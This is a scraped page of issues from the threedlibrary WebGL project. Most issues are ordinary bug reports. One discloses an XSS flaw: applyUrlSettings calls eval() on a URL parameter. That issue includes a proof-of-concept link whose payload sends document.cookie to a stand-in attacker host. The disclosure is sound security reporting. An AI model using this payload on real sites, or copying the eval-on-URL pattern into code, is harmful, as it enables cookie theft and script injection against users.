ellayunyun / threedlibrary Goto Github PK
View Code? Open in Web Editor NEWAutomatically exported from code.google.com/p/threedlibrary
Automatically exported from code.google.com/p/threedlibrary
in tdl.error: move window.dump behind the window.console condition
Original issue reported on code.google.com by [email protected]
on 19 Oct 2012 at 3:39
Attachments:
webgl.js registerContextLostHandler and registerContextRestoredHandler
reference window.canvas
See lines 197 and 206:
http://code.google.com/p/threedlibrary/source/browse/tdl/webgl.js?spec=svn96ae27
81ac090bbdc8fc02c1897a0cf440de6da7&r=96ae2781ac090bbdc8fc02c1897a0cf440de6da7
This is fixed in the version used in
http://webglsamples.googlecode.com/hg/aquarium/aquarium.html
If you have those changes, could you please push them to this repo? Thanks.
Original issue reported on code.google.com by [email protected]
on 21 Nov 2011 at 3:26
What steps will reproduce the problem?
When you don't name canvas variable as "canvas"
i.e., assume you have a canvas component with id canvas and you refer it with a
variable named "canvas1":
var canvas1 = document.getElementById("canvas");
instead of "canvas"
var canvas = document.getElementById("canvas");
then registerContextLostHandler or registerContextRestoredHandler will crash
since they access variable "canvas" which is not one of the input parameter, so
if you declare variable name as canvas, they will access it as a global
variable; and if you don't the variable is undefined.
They shouldn't access canvas this way
Original issue reported on code.google.com by [email protected]
on 24 Dec 2011 at 3:35
What steps will reproduce the problem?
1.
2.
3.
What is the expected output? What do you see instead?
What version of the product are you using? On what operating system?
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 6 Aug 2013 at 10:45
I've fixed this in my clone here:
https://code.google.com/r/axisofentropy-threedlibrary/source/detail?r=23ec5db0c9
f6705286828ea72b998a84fc5eb318
but I don't see how to do a "pull request" on Google Code.
Original issue reported on code.google.com by [email protected]
on 18 Jul 2012 at 12:56
What steps will reproduce the problem?
1. Follow this link
http://webglsamples.googlecode.com/hg/aquarium/aquarium.html?webgl=document.crea
teElement('img').src%3d'http://xss.attacker.net/xss.php?'+document.cookie
2. Use Chrome debugger or similar to monitor net traffic
What is the expected output? What do you see instead?
In the debugger you should see only requests to googlecode.com.
However, you will see a 404 GET to xss.attacker.com, with your cookies
attached. Fortunately for you in this exploit code, googlecode does not seem to
attach any cookies, but most sites will.
Attacker can run arbitrary script in user's with the privileges of the web page.
What version of the product are you using? On what operating system?
Please provide any additional information below.
tdl.misc.applyUrlSettings parses the url string and calls eval() on the value
of the webgl query parameter, if present. Party on Garth.
Original issue reported on code.google.com by [email protected]
on 21 Nov 2011 at 7:47
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.